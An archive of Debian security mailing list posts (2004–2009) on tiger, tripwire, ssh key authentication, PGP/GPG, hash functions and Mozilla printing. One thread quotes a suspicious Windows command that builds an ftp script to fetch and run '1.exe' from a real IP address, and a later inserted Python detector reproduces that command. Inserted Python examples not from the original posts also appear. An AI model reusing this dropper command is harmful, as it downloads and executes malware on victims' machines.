Re: Tiger, dirvish and dangling symlinks

2009-10-11 Thread Dale Amon
On Mon, Sep 28, 2009 at 01:12:31AM +0200, Javier Fernández-Sanguino Peña wrote:
> On Tue, Sep 01, 2009 at 08:53:34PM +0100, Dale Amon wrote:
> > So is there a way to simply tell tiger to not look
> > at certain disk drives? It seems rather silly to have
> > it wasting time processing 30-40TB of backups when all
> > that is needed is to monitor the actual system disks.
> 
> IIRC You can use the Tiger_FSScan_NonLocal variable to have Tiger skip those
> filesystems that are not considered "local" or you can disable (in
> /etc/tiger/cronrc) the checks that will process the filesystem starting from
> / (check_perms, find_files, check_devices
> 
> Regards
> 
> Javier

Thanks. I'll look into that!




signature.asc
Description: Digital signature


Tiger, dirvish and dangling symlinks

2009-09-01 Thread Dale Amon
I am working on a backup box with a huge disk capacity
that is being used as a dirvish incremental backup for
a bunch of systems.

This of course means there are just thousands upon 
thousands of 'apparently' dangling symlinks since
the backups are 'out of context' as it were.

This causes tiger to output useless emails about
them and waste space in security logs about them.

So is there a way to simply tell tiger to not look
at certain disk drives? It seems rather silly to have
it wasting time processing 30-40TB of backups when all
that is needed is to monitor the actual system disks.

Ad Astra,
Dale Amon








Re: Time to replace MD5?

2007-06-13 Thread Dale Amon
On Tue, Jun 12, 2007 at 07:39:38PM -0400, Joey Hess wrote:
> Bernd Eckenfels wrote:
> > Because open source is all about choice.
> 
> So it's there because of a platitude?
> 
> > There might be admins using dpkg -i
> > or security officers who build their local mirrors manually.
> 
> Then why don't we include md5sums and wget commands for all packages in
> stable point release announcements? Why not include them in major release
> announcements too? Or are these things somehow less "all about choice"?

Yes, there are a lot of us who use dpkg -i, and do it
very often. I may be missing something in this thread
because it seems so blatantly obvious to me that this
is a necessary and important tool that I am having
difficulty understanding where this is going.




-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Re: spooky windows script

2007-05-08 Thread Dale Amon
On Tue, May 08, 2007 at 02:57:24PM +0200, Jan Outhuis wrote:
> %systemroot%\system32\cmd.exe
> cmd /c echo open 59.31.153.120 22783 >> ik &echo user db database >> ik &echo 
> get 1.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &1.exe &exit

If you were running a windows system this might
do something really nasty since it creates a download
script and executes it. Perhaps to pull in a root kit?
I haven't done DOS in a long time so I am a bit shaky 
in fully interpreting.

Check for something named 1.exe in your directory.
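
A detection sketch for the pattern described above, as an added example that is not part of the original post: it flags a command line that builds an ftp script with echo redirects, runs it with ftp -s:, and then executes the file it fetched. The function name and the benign sample are constructed; the suspicious sample is the command quoted in the thread.

```python
import re

# Leading "cmd /c" wrapper, "echo text >> file", and "ftp ... -s:file" steps.
CMD_PREFIX = re.compile(r"^cmd(\.exe)?\s+/c\s+", re.I)
ECHO_REDIRECT = re.compile(r"^echo\s+(?P<text>.*?)\s*>>?\s*(?P<file>\S+)$", re.I)
FTP_SCRIPT = re.compile(r"^ftp(\.exe)?\s.*?-s:(?P<file>\S+)", re.I)

# The command quoted in the thread, joined onto one line.
SAMPLE_FROM_THREAD = (
    "cmd /c echo open 59.31.153.120 22783 >> ik &echo user db database >> ik "
    "&echo get 1.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &1.exe &exit"
)
# Constructed benign line: echo redirect without any ftp script use.
SAMPLE_BENIGN = "cmd /c echo build finished >> build.log & dir"


def analyze_cmdline(cmdline):
    """Report whether one command line writes an ftp script, runs it,
    and then executes a file that the script downloaded.

    Simplification: steps are split on '&' without honouring cmd quoting.
    """
    scripts = {}  # script file name (lower case) -> lines appended by echo
    result = {"ftp_script": None, "remote": None, "fetched": [],
              "executed": [], "script_deleted": False}

    for step in (s.strip() for s in cmdline.split("&")):
        step = CMD_PREFIX.sub("", step)
        if not step:
            continue

        m = ECHO_REDIRECT.match(step)
        if m:
            scripts.setdefault(m.group("file").lower(), []).append(m.group("text"))
            continue

        m = FTP_SCRIPT.match(step)
        if m and m.group("file").lower() in scripts:
            # ftp is driven by a script assembled earlier in the same line.
            result["ftp_script"] = m.group("file")
            for line in scripts[m.group("file").lower()]:
                words = line.split()
                if not words:
                    continue
                verb = words[0].lower()
                if verb == "open" and len(words) >= 2:
                    has_port = len(words) > 2 and words[2].isdigit()
                    result["remote"] = (words[1], int(words[2]) if has_port else 21)
                elif verb in ("get", "recv", "mget") and len(words) >= 2:
                    result["fetched"].append(words[1])
            continue

        words = step.split()
        first = words[0].lower()
        if (first in ("del", "erase") and result["ftp_script"] and len(words) > 1
                and words[1].lower() == result["ftp_script"].lower()):
            result["script_deleted"] = True  # the script file is cleaned up
        elif first in (f.lower() for f in result["fetched"]):
            result["executed"].append(words[0])  # downloaded file is run

    result["suspicious"] = bool(result["ftp_script"] and result["executed"])
    return result


if __name__ == "__main__":
    for sample in (SAMPLE_FROM_THREAD, SAMPLE_BENIGN):
        print(analyze_cmdline(sample))
```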





Re: [OT] Re: email notifications when users login

2006-09-23 Thread Dale Amon
On Thu, Sep 21, 2006 at 03:37:56PM -0400, Morgan Walker wrote:
> 
> Thanks Michelle that worked perfect.  Is there an easy variable I could
> throw in there that you know off hand which would include the time
> (MM/DD/) as well?

TIME=`date +%m/%d/%Y`

-- 
--
 Artemis Systems Development
   Dale Amon [EMAIL PROTECTED]+44-7802-188325
   International linux systems consultancy
 Hardware & software system design, security
and networking, systems programming and Admin
  "Have Laptop, Will Travel"
--





Re: serious bug / 1.7.8-1sarge7.2.1_i386 / URGENT

2006-09-05 Thread Dale Amon
On Tue, Sep 05, 2006 at 01:04:40AM +0200, Von Wolher wrote:
> Thank you very much for the lightspeed reaction and fix !!!
> I'll set those extra lines in the sources.list of a few general use
> boxes which also run pure debian sarge and will keep you updated in case
> an update doesn't work out.

Perhaps I am not the only one who has seen problems
in recent firefox updates then... I can reliably crash
my firefox browser simply by going to google maps. It
starts loading the map... and then falls over.



Re: closing unwanted ports - and what is 1720/tcp filtered H.323/Q.931

2005-12-15 Thread Dale Amon
On Thu, Dec 15, 2005 at 12:35:09PM +, kevin bailey wrote:
> what is 
> 1720/tcp filtered H.323/Q.931

Are you running any VOIP? H323 is the standard for telephone
interchanges.

> and how do i turn it off if it is unnecessary.

netstat, lsof, fuser, the usual suspects...



Re: hardening checkpoints

2005-12-15 Thread Dale Amon
On Thu, Dec 15, 2005 at 12:27:01PM +, kevin bailey wrote:
> 2. firewall
> not i'm not sure about the need for a firewall - i may need to access the
> server over ssh from anywhere.  also, to run FTP doesn't the server need to
> be able to open up a varying number of ports.

There is a way around this. If you are really worried
about a mistake, use 'at' to turn the firewall off after
5 minutes. That way you can set up your test and if
you screwed up you only have to wait a few min before
it goes away. If it worked, you just kill the queued
at command line.



Re: What is a security bug?

2005-11-24 Thread Dale Amon
On Wed, Nov 23, 2005 at 11:10:25PM -0800, Thomas Bushnell BSG wrote:
> It seems it does not save form entries (which was not mentioned
> explicitly in Florian's post above), but it certainly does save the
> tabs and multiple windows information and such.

Galeon and firefox have *always* had this sort of 
crash problem. It is especially apparent when printing
ps to file. There are some **major** sites which will 
reliably crash your browser.




Re: On Mozilla-* updates

2005-08-01 Thread Dale Amon
On Mon, Aug 01, 2005 at 09:29:24AM +0200, Stefano Salvi wrote:
> I think that two kinds of people are interested in Debian:
> - Ones who want Security
> - Ones who want Stability

While not an unreasonable part of an analysis, I would
posit these are at least second level criteria for
systems users. The most important factor for anyone
in a corporate environment, (and for many in a home
environment as well), is "Does Debian allow me to get
my work done faster and more efficiently?"

Issues of security, package content, stability and
such are imperfect tradeoffs towards fulfilling that
goal. 



Re: My machine was hacked - possibly via sshd?

2005-03-29 Thread Dale Amon
On Mon, Mar 28, 2005 at 12:37:46PM -0800, Alvin Oga wrote:
> > When I logged on I discovered two outgoing connections to port ircd on 
> > the foreign hosts, and some thing listening on port 48744 TCP.  
> 
> sorta harmless ... script kiddies having fun

Does not sound like it. I would say it was a trojan
calling home for orders. The criminal gangs tend to 
use irc for botnet control.



Spamassassin slowdown?

2005-01-20 Thread Dale Amon
Has anyone noticed a big slow down in spam assassin?
I know it is no speed demon in the best of times, but
I have started seeing huge loads and am modifying my
exim4.conf to send fewer files through it... just so
I can receive email again.

The problem began just a couple of days ago, I believe
not long after the last dselect update I did...

My poor little server is on its knees crying in pain. 
Very sad sight. :-(



Re: A tripwire annoyance

2004-10-06 Thread Dale Amon
On Wed, Oct 06, 2004 at 10:56:53AM -0400, Noah Meyerhans wrote:
> On Wed, Oct 06, 2004 at 02:53:19PM +0100, Dale Amon wrote:
> > I've been running tripwire on a particular server
> > for some years and finally got annoyed at skimming through
> > the large reports, so I began an update... After 24 hours
> > I thought it was hung and killed it. I restarted it
> > with verbose and found that it is indeed working. And
> > just for the hell of it, I've left it running to see
> > how long it would take.
> 
> Which version of tripwire is this?  It sounds like behavior I'd expect
> to see with the ancient ancient ancient version that we shipped prior to
> woody (there is no tripwire in woody), but I've never seen anything like
> that with tripwire 2+.
> 
> How did you perform this update?  The "right way" to do it is to do
> 'tripwire -m u ', which doesn't actually look at the
> filesystem at all but simply merges the filesystem data contained in the
> report into the database.
> 
> noah
> 

I usually do this:

 tripwire --update -V emacs -Z high -r /var/lib/tripwire/report/--.twr

but the second run through I had already looked over the
file so I did this:

 tripwire -v -a -r /var/lib/tripwire/report/--.twr



A tripwire annoyance

2004-10-06 Thread Dale Amon
I've been running tripwire on a particular server
for some years and finally got annoyed at skimming through
the large reports, so I began an update... After 24 hours
I thought it was hung and killed it. I restarted it
with verbose and found that it is indeed working. And
just for the hell of it, I've left it running to see
how long it would take.

It has been running for 10 days now, and almost entirely
within the /var/log/snort directory. Has anyone else
had problems with tripwire and snort together on a 
box on an ISP backbone (ie lots of snort files)?

I've been considering stopping it and fiddling with
the config, but first... I'm curious if I am alone in 
this problem.



Re: [OT] Collective memory query

2004-09-27 Thread Dale Amon
On Mon, Sep 27, 2004 at 10:04:00PM +1000, Andrew McGlashan wrote:
> Try again:
> http://packages.debian.org/testing/utils/rpl
> "Intelligent recursive search/replace utility"

Thanks much. I do believe that is the one. 

*amon runs off to dselect yet again...



[OT] Collective memory query

2004-09-27 Thread Dale Amon
A couple years ago I ran across a sed like program
that will recursively descend through a tree and apply
specified edits in place. I have searched my notes,
gone through the deb available and have not been able
to find it. Might just have been something on
SourceForge...

Has anyone else run across a program of this nature?



Re: telnetd vulnerability from BUGTRAQ

2004-09-25 Thread Dale Amon
On Sat, Sep 25, 2004 at 10:34:43AM -0500, hanasaki wrote:
> Jan Minar wrote:
> >On Fri, Sep 24, 2004 at 04:15:09PM -0600, s. keeling wrote:
> >>Is anyone still using telnet when there's ssh?  Why?  I wouldn't even
> >>use it inside my own firewalled LAN.  ssh is just better.
> >I've been told telnet *does* make a lot of sense where IPSEC is set up.
> 
> When IPSEC is being used, telnet works the same; however is secure 
> because it, like all traffic, is sent over a transparent tunnel.

One very good reason to avoid it even in tunnels is
that you get into bad habits. One tired night you 
forget and connect over an unsecured link to a
key machine... and you're toast.



Re: telnetd vulnerability from BUGTRAQ

2004-09-24 Thread Dale Amon
On Sat, Sep 25, 2004 at 08:28:13AM +1000, Matthew Palmer wrote:
> Cisco gear contains the Debian telnetd?  And if that's true, how would us
> releasing a DSA for it necessarily help all the Cisco routers out there.
> We're not talking about the general intelligence of using telnet (or, at
> least, that wasn't the initial topic of discussion), but rather the
> possibility of fixing security problems in the stock telnetd in Debian.

The question asked was "why is anyone still using telnet
when there is ssh". And I would say that Cisco and some
other gear are about the only reasons why anyone would
still make a connection with the telnet protocol (other
than for testing odd things... I used to use 'telnet foo 110'
to hand test my company pop server when someone had problems.

So no, I was not replying about Debian fixes, I was replying
to the general question of 'why telnet at all'.



Re: telnetd vulnerability from BUGTRAQ

2004-09-24 Thread Dale Amon
On Fri, Sep 24, 2004 at 04:15:09PM -0600, s. keeling wrote:
> Is anyone still using telnet when there's ssh?  Why?  I wouldn't even
> use it inside my own firewalled LAN.  ssh is just better.

Unfortunately if you use Cisco gear you are pretty
much stuck. Some of the older stuff just doesn't
have the mips to deal with it even if installed and
I believe Cisco charges an arm and a leg for the
upgrade. I've never had a Cisco with it installed.

So use, if you work with routers, you are stuck.



Re: ssh publickey auth

2004-09-14 Thread Dale Amon
On Tue, Sep 14, 2004 at 05:06:59PM +0200, Fox wrote:
> On Tue, Sep 14, 2004 at 04:01:57PM +0100, Dale Amon wrote:

> > Failed to add the host to the list of known hosts (/user1/.ssh/known_hosts).
> 
> Don't you see any problem here ?

It was a symptom which I mistook for something else
entirely since I was still able to log in with a 
password.

It's the client side protections. I was blindly 
focusing on the server side.



Re: ssh publickey auth

2004-09-14 Thread Dale Amon
On Tue, Sep 14, 2004 at 04:05:23PM +0100, Jan Eringa wrote:
> The newer versions of SSH(d) are very strict about
> the file permissions on the .ssh directory & the public key pair

Yes, I spotted that just after I sent a reply. That fixed the
problem.
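
The permission strictness mentioned in the quoted remark above can be checked before it bites. This is an added example, not part of the thread and not OpenSSH's own code: it applies the ownership and mode rules that sshd's StrictModes and the ssh client enforce, and the directory layout and file names (including id_dsa) are constructed in a temporary directory.

```python
import os
import stat
import tempfile


def server_side_problems(home, authorized_keys, uid):
    """Rules sshd applies with StrictModes: the key file and every directory
    from it up to the home directory must be owned by the user or root and
    must not be writable by group or others."""
    problems = []
    home = os.path.realpath(home)
    path = os.path.realpath(authorized_keys)
    while True:
        st = os.stat(path)
        mode = stat.S_IMODE(st.st_mode)
        if st.st_uid not in (0, uid):
            problems.append(f"{path}: owned by uid {st.st_uid}")
        if mode & 0o022:
            problems.append(f"{path}: mode {mode:04o} is group/world-writable")
        parent = os.path.dirname(path)
        if path == home or parent == path:
            break
        path = parent
    return problems


def client_side_problems(private_key, uid):
    """Rule the ssh client applies: a private key owned by the user must not
    be accessible by group or others, or the key is ignored."""
    st = os.stat(private_key)
    mode = stat.S_IMODE(st.st_mode)
    if st.st_uid == uid and mode & 0o077:
        return [f"{private_key}: mode {mode:04o} is readable by group/others"]
    return []


def demo():
    """Build a constructed home directory with two mistakes, audit it,
    fix the modes, and audit again. Returns (before, after)."""
    uid = os.getuid()
    with tempfile.TemporaryDirectory() as home:
        ssh_dir = os.path.join(home, ".ssh")
        auth = os.path.join(ssh_dir, "authorized_keys")
        key = os.path.join(ssh_dir, "id_dsa")
        os.mkdir(ssh_dir)
        for path in (auth, key):
            with open(path, "w") as fh:
                fh.write("constructed placeholder, not real key material\n")

        os.chmod(home, 0o755)
        os.chmod(ssh_dir, 0o775)   # mistake 1: group-writable .ssh
        os.chmod(auth, 0o644)
        os.chmod(key, 0o644)       # mistake 2: world-readable private key
        before = server_side_problems(home, auth, uid) + client_side_problems(key, uid)

        os.chmod(ssh_dir, 0o700)
        os.chmod(auth, 0o600)
        os.chmod(key, 0o600)
        after = server_side_problems(home, auth, uid) + client_side_problems(key, uid)
    return before, after


if __name__ == "__main__":
    before, after = demo()
    print("before:", *before, sep="\n  ")
    print("after:", after)
```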



Re: ssh publickey auth

2004-09-14 Thread Dale Amon
rinfo for scout.islandone.org failed - POSSIBLE BREAKIN ATTEMPT!
debug1: PAM: setting PAM_RHOST to "10.0.0.25"
debug1: PAM: setting PAM_TTY to "ssh"
debug1: temporarily_use_uid: 1008/1008 (e=0/0)
debug1: trying public key file /user1/.ssh/authorized_keys
debug1: matching key found: file /user1/.ssh/authorized_keys, line 1
Found matching DSA key: ee:c5:7d:12:df:db:e7:d6:aa:43:17:c0:19:e0:a0:35
debug1: restore_uid: 0/0
Postponed publickey for user1 from 10.0.0.25 port 2743 ssh2
debug1: userauth-request for user user1 service ssh-connection method keyboard-interactive
debug1: attempt 2 failures 1
debug1: keyboard-interactive devs 
debug1: auth2_challenge: user=user1 devs=
debug1: kbdint_alloc: devices 'pam'
debug1: auth2_challenge_start: trying authentication method 'pam'
Postponed keyboard-interactive for user1 from 10.0.0.25 port 2743 ssh2
Connection closed by 10.0.0.25

And yes, there are some things on my test lan's dns 
that need sorted :-)

I might add that the target machine is a testbed with
sarge-di installed about a week or two ago and then
updated and added to via dselect. So it is really
bog-standard debian.



Re: ssh publickey auth

2004-09-14 Thread Dale Amon
On Tue, Sep 14, 2004 at 04:08:17PM +0200, Oliver Hitz wrote:
> It is possible that public key authentication is disabled in
> /etc/ssh/sshd_config. Check that you have "PubkeyAuthentication yes" in
> said file.

Double checked. It is 'yes' on the server, target
host sshd_config. According to docs it is the default
for the client ssh_config which is 'out of the box'
debian with everything defaulted.



ssh publickey auth

2004-09-14 Thread Dale Amon
I've an application that needs a secure automatic login 
from an application program, between particular accounts
on particular machines.

I know this used to work (a few years ago!) but I
am having difficulty this time around getting it going.

I'm using a public key for the connection, with null
password given when asked by the ssh-keygen.

The destination machine accepts that the publickey
is valid but asks for a passphrase nonetheless. It
doesn't accept a return for null password either, it
falls back on normal password log in. 

As I said, I've not done this particular set up in,
oh, 6 years, so I would not be surprised if there
were changes in the debian defaults for sshd, pamd,
the way ssh handles things etc, etc.

A suggestion or three would be appreciated.



PGP vs GPG

2004-08-27 Thread Dale Amon
Hmmm... We were just talking about this key compatibility
issue a couple weeks ago. Is there something special you have
to do in Debian to import PGP keys? Didn't the RSA patent
expire already?

gpg --import < amon.pub
gpg: key 42F4CD71: public key "Dale Amon (office) <[EMAIL PROTECTED]>" imported
gpg: Total number processed: 1
gpg:   imported: 1

gpg --import < gary.pub 
gpg: no valid OpenPGP data found.
gpg: Total number processed: 0
cat gary.pub 
-BEGIN PGP SIGNATURE-
Version: PGP Personal Privacy 6.5.8

 

-END PGP SIGNATURE-




Re: MD5 collisions found - alternative?

2004-08-25 Thread Dale Amon
On Thu, Aug 26, 2004 at 01:04:21AM +0200, Almut Behrens wrote:
> ...and I think somewhere in between lie hashing functions like crc32,
> as used for detecting transmission errors, for example.  Those are
> not cryptographic, but possess a sufficiently large output space, so we
> can expect few random collisions for most practical purposes.

I wouldn't call CRC a hash code although you can use it that way
I guess. It is really an error detecting and correction
code that does have the ability, in a sense, to go backwards. It 
stands for Cyclic Redundancy Check. Such codes are redundant data,
to be included with a transmission, not a hash. Some of them
allow correction of multiple bit errors; typically you can detect
1 bit of error more than you can correct.
 
> Right, but I believe that a uniform mapping _also_ is a desirable
> property (besides speed, of course) of hashing functions as used to
> compute table lookup indices -- as this property assures that the data
> storage locations will be spread as evenly as possible across the
> available buckets, which in turn minimizes the time spent on resolving
> collisions (on average).  And, as practical considerations in this case
> always enforce a rather small output space (i.e. number of buckets)
> we're certainly expecting collisions here. [1]

Well, in theory yes. In practice you usually aren't much fussed
if you've got a variance in the bucket utilization unless you're
working on something with a real need for speed. For example, I
would bet there are some really, really good uniform hash functions
used inside of gcc. 
 
> > * randomness. Input strings which differ by 1 bit in any
> >   position generate hash keys a random distance apart
> 
> I'd add:
>   * huge size of the output space (with its upper limit corresponding
> to the number of bits of the hash value).  The probability of
> accidentally finding a collision is of course directly related to
> the size of the output space (assuming a uniform mapping).

Yes, can't argue there. That is where the basic difference between
a typical hash function and a cryptographic hash comes. You want
small keyspaces and very simple functions to generate lookup keys,
whereas you don't much care about the function overhead for a
cryptographic key as you tend not to do the encodings as often.
 
> If anyone knows of any other requirements, please feel free to chime
> in... Well, OTOH, this would probably be getting a little off-topic for
> debian-security (especially the debian aspect).



Re: MD5 collisions found - alternative?

2004-08-25 Thread Dale Amon
On Wed, Aug 25, 2004 at 06:02:22AM +0200, Almut Behrens wrote:
> Somewhat more seriously: are there generally any defining criteria for
> something one would call a 'hash function', saying that it always must
> map some larger input space to some smaller output space?

Yes. A hash function is any mapping function

y = map(x)

where the space y is smaller than the space x. Hashing (think of
cornbeef hash with things all chopped up into bits) is a technique
to generate fast lookup keys. The discussion here is about 
cryptographic hash functions. I believe the primary difference is
that a cryptographic hash is:

* a uniform mapping. For input space n and output space m,
  there are on average n/m strings with the same hash key.
* randomness. Input strings which differ by 1 bit in any
  position generate hash keys a random distance apart
  
While these features are also useful in writing assembler
and compilers, they are not *that* important. I've often
used hash functions as simple as:

"add the first 8 chars and take the low byte
 of the integer summand."

Obviously not cryptographic.
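
An added example, not part of the original post, that measures the additive hash quoted above against the two listed properties, next to SHA-256 truncated to one byte so both use the same 256 buckets. The function names and the sample keys are constructed for illustration.

```python
import hashlib
from collections import Counter


def additive_hash(data: bytes) -> int:
    """The lookup hash from the post: add the first 8 chars, keep the low byte."""
    return sum(data[:8]) & 0xFF


def sha256_bucket(data: bytes) -> int:
    """A cryptographic hash truncated to one byte (same 256-bucket output space)."""
    return hashlib.sha256(data).digest()[0]


def bucket_stats(hash_fn, keys):
    """Uniformity check: (number of buckets used, size of the fullest bucket)."""
    counts = Counter(hash_fn(k) for k in keys)
    return len(counts), max(counts.values())


def flip_deltas(hash_fn, data: bytes):
    """Randomness check: flip each bit of the first byte in turn and return
    how far the hash value moves (mod 256) for each flipped bit."""
    base = hash_fn(data)
    deltas = []
    for bit in range(8):
        flipped = bytes([data[0] ^ (1 << bit)]) + data[1:]
        deltas.append((hash_fn(flipped) - base) % 256)
    return deltas


# Constructed sample keys: 1000 sequential account-style names, 8 bytes each.
KEYS = [b"user%04d" % i for i in range(1000)]


if __name__ == "__main__":
    # Reordering the bytes, or changing anything past byte 8, never changes
    # the additive hash, so collisions can be written down by hand.
    print(additive_hash(b"listen") == additive_hash(b"silent"))
    print(additive_hash(b"/var/log/snort") == additive_hash(b"/var/log/mail"))

    # Flipping bit i moves the additive hash by exactly +/- 2**i: predictable,
    # not "a random distance apart".
    print("additive deltas:", flip_deltas(additive_hash, b"A"))
    print("sha256 deltas:  ", flip_deltas(sha256_bucket, b"A"))

    # The additive hash piles the keys into a few buckets; the truncated
    # cryptographic hash spreads them over nearly all 256.
    print("additive (used, fullest):", bucket_stats(additive_hash, KEYS))
    print("sha256   (used, fullest):", bucket_stats(sha256_bucket, KEYS))
```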




Re: pgp in Debian: obsolete?

2004-08-05 Thread Dale Amon
On Thu, Aug 05, 2004 at 11:40:09AM -0700, Rick Moen wrote:
> > Keep in mind people may have encrypted files and email
> > archived. The means of accessing archive data should
> > be considered to be at least as immortal as the data
> > itself.
> 
> Aren't GnuPG's decryption/verification features a superset of those in
> PGPi 5.0?  That's not a rhetorical question:  I've been telling people
> that for years in a good faith effort at accuracy, and so will
> appreciate any corrections.

I don't know for sure either. I do seem to remember 
there was a document explaining how to transition
and that there was a new key generation method. I also
vaguely remember having some problem with my own
package signing keys when the switch was made from
PGP to GPG, but that is 4-5 years ago and I cannot
for the life of me remember the details. I just have
a vague disquiet about it.

I'm certain that somewhere I've got files using the
old keys, and since I'm in Ireland, Murphy will
drop in for tea the day after PGP goes away...




Re: pgp in Debian: obsolete?

2004-08-05 Thread Dale Amon
On Thu, Aug 05, 2004 at 06:51:22PM +0100, Ian Beckwith wrote:
> If there is a demand for it, is there any reason I shouldn't upgrade
> to the package to the latest pgp? (6.5.8 I believe, assuming the
> international pgp restrictions no longer apply).

Keep in mind people may have encrypted files and email
archived. The means of accessing archive data should
be considered to be at least as immortal as the data
itself.




Re: Exim security may be breaking some functionality

2004-07-14 Thread Dale Amon
On Wed, Jul 14, 2004 at 09:57:01AM +0200, Florian Weimer wrote:
> > Would someone concerned with exim packaging and
> > security contact me directly?

Exim4, but I've got the problem understood and sorted.
Exim drops some privs during the time while it does
verifies. Specifically, during a verify-only of
mine in a router, accessed during the HELO.

After discussion with Philip, I solved my problem
by writing a client/server pair to handle my
address verifies and call the client from Exim4.




Re: Mozilla/Firefox "PostScript/default" security problems

2004-07-10 Thread Dale Amon
On Sat, Jul 10, 2004 at 12:47:18PM +0200, Magnus Therning wrote:
> Yes. Printing PS to a file is still possible.

Thanks. I had visions of all sorts of extra work in
order to just stand still. Now I can forget about this
and go back to writing my mail address verify 
daemon...




Re: Mozilla/Firefox "PostScript/default" security problems

2004-07-10 Thread Dale Amon
On Fri, Jul 09, 2004 at 06:38:49PM -0500, Brad Sims wrote:
> If you want postscript back; simply grab the source deb and roll your own; 
> just edit rules under the debian folder. Delete the '--with-xprint' and
> '--disable-postscript' lines and do 'dpkg-buildpackage -rfakeroot'. However 
> I did give the debs a version number of 99 to keep apt from updating them
> until there is a new mozilla version from upstream.

I'd like a black and white clarification of the impact 
of the change so I know for certain whether to be
incredibly pissed off at the packager or not:

"If I were to dselect today, would I still
 be able to print to file a website page 
 as ps?" [Y/N] 

I do this as a matter of course, every single day
to archive data important to projects I work on. I
don't have time to rebuild mozilla myself all the time,
so if the answer to this is that I cannot... I have
four choices in descending order of desirability:

* find someone else with a repository that
  overrides it.

* freeze forever / manually update selected
  packages.

* abandon Debian mozilla

* abandon Debian

If it is true that someone out there is playing with 
things important to my means of making a living, I do 
not appreciate it in the least.




Re: Cite for print-to-postscript exploit in Mozilla?

2004-07-09 Thread Dale Amon
On Fri, Jul 09, 2004 at 12:18:30PM -0300, Henrique de Moraes Holschuh wrote:
> OTOH, maybe the postscript code in mozilla itself has a security hole.  But
> the right thing to do would be to *fix* that instead, not to drop it.

Question: are you saying that Mozilla based browsers
(eg Galeon) can now not print web pages to a postscript
printer or have I missed something? If that is the
case, I will not be doing a dselect for a very long
time! Webpage printing is a nonnegotiable, mission
critical tool in my Revenue Generating Activities...

-- 
--
   Dale Amon [EMAIL PROTECTED]+44-7802-188325
   International linux systems consultancy
 Hardware & software system design, security
and networking, systems programming and Admin
  "Have Laptop, Will Travel"
--



Exim security may be breaking some functionality

2004-07-04 Thread Dale Amon
Would someone concerned with exim packaging and
security contact me directly? I've got some issues
that are a bit lengthy and specialized and probably
of little interest to most.

I believe something done recently may have caused
some obscure breakage in queryprogram. 

Please RSVP at your earliest convenience...

-- 
--
   Dale Amon [EMAIL PROTECTED]+44-7802-188325
   International linux systems consultancy
 Hardware & software system design, security
and networking, systems programming and Admin
  "Have Laptop, Will Travel"
--



Re: Why not push to stable?

2004-06-29 Thread Dale Amon
On Sat, Jun 26, 2004 at 09:27:23PM +0200, Andreas Barth wrote:
> * martin f krafft ([EMAIL PROTECTED]) [040626 15:55]:
> > Note that I am not trying to undermine or criticise or change the
> > Debian security policy. I just want to understand it.

Let's say you have your own internal corporate release.
You have a policy in place that requires you to be able
to identify precisely what the internal state of your
thousands of machines is. Or perhaps you are a facility
that audits things and you do your own secret fixes 
(for instance if you were a government security agency).

You want to at all times have a stable, known base to
start from to apply *your own* fixes. You do not want
stable to be changing underneath you every second day.
If it does, you will go stark raving mad trying to
keep your internal facilities and patches and applications
synced.

Debian is doing this the correct way. Stable is just
what it says on the label: stable. It is a base you
can build on and it won't change underneath you.

-- 
--
   Dale Amon [EMAIL PROTECTED]+44-7802-188325
   International linux systems consultancy
 Hardware & software system design, security
and networking, systems programming and Admin
  "Have Laptop, Will Travel"
--



Re: password managers

2004-06-14 Thread Dale Amon
On Mon, Jun 14, 2004 at 02:56:15PM -0400, andrew lattis wrote:
> what does everyone else use to keep track of all their passwords?

Try gringotts.

-- 
--
   Dale Amon [EMAIL PROTECTED]+44-7802-188325
   International linux systems consultancy
 Hardware & software system design, security
and networking, systems programming and Admin
  "Have Laptop, Will Travel"
--



Re: rbl's status?

2004-06-14 Thread Dale Amon
On Mon, Jun 14, 2004 at 04:57:42PM +1000, Russell Coker wrote:
> relays.ordb.org, reject_rhsbl_client rhsbl.sorbs.net, reject_rhsbl_client 
> dsn.rfc-ignorant.org, reject_rhsbl_client postmaster.rfc-ignorant.org

Just to publicly eat my previous words... I submitted
the request, had a *person* respond within 5 minutes
and removal is already in the queue.

Amazing.

-- 
--
   Dale Amon [EMAIL PROTECTED]+44-7802-188325
   International linux systems consultancy
 Hardware & software system design, security
and networking, systems programming and Admin
  "Have Laptop, Will Travel"
--



Re: rbl's status?

2004-06-14 Thread Dale Amon
On Mon, Jun 14, 2004 at 04:57:42PM +1000, Russell Coker wrote:
> a test message to [EMAIL PROTECTED] and it hasn't bounced yet...  Maybe the 
> Yahoo abuse team are being butt-heads about clicking on the removal URL.

Yeah, I just found I got listed by ignoramuses about RFC's due to a
mail helper program crashing...
 
-- 
--
   Dale Amon [EMAIL PROTECTED]+44-7802-188325
   International linux systems consultancy
 Hardware & software system design, security
and networking, systems programming and Admin
  "Have Laptop, Will Travel"
--



Re: rbl's status?

2004-06-13 Thread Dale Amon
On Sun, Jun 13, 2004 at 06:33:13PM +0100, Adam D. Barratt wrote:
> I'd guess that was easier than fixing all the references to the RBL[+],
> RSS and DUL littered through the documentation.

Point taken... but then again, who on Earth actually
re-reads the whole doc a second time, rather than
just a search for a specific keyword? 

I've tried a couple times. Puts me right to sleep :-)

-- 
------
   Dale Amon [EMAIL PROTECTED]+44-7802-188325
   International linux systems consultancy
 Hardware & software system design, security
and networking, systems programming and Admin
  "Have Laptop, Will Travel"
--



Re: rbl's status?

2004-06-13 Thread Dale Amon
On Sun, Jun 13, 2004 at 07:46:15PM +0300, Vassilii Khachaturov wrote:
> I believe it's very old news, smth like 4-5 years or so.

I'd not thought about it because they are still used
in the examples all over specs.txt. Perhaps I should
email Philip about it.

-- 
--
   Dale Amon [EMAIL PROTECTED]+44-7802-188325
   International linux systems consultancy
 Hardware & software system design, security
and networking, systems programming and Admin
  "Have Laptop, Will Travel"
--



Re: rbl's status?

2004-06-13 Thread Dale Amon
On Sun, Jun 13, 2004 at 12:54:11PM -0400, Noah Meyerhans wrote:
> On Sun, Jun 13, 2004 at 07:46:15PM +0300, Vassilii Khachaturov wrote:
> > > What are the recommended rbl's these days?
> > 
> > Best thing is ask on NANAE or exim-users or whatever your favourite MTA is.
> > Here's what I am using here RBL-wise:
> > 
> > rbl_domains = bl.spamcop.net/reject : 
> > relays.osirusoft.com/reject :spamhaus.relays.osirusoft.com/reject : 
> > sbl.spamhaus.org/reject
> 
> You do realize that the osirusoft blacklists are defunct and have been
> for several months, right?  Basing your decision of whether or not to
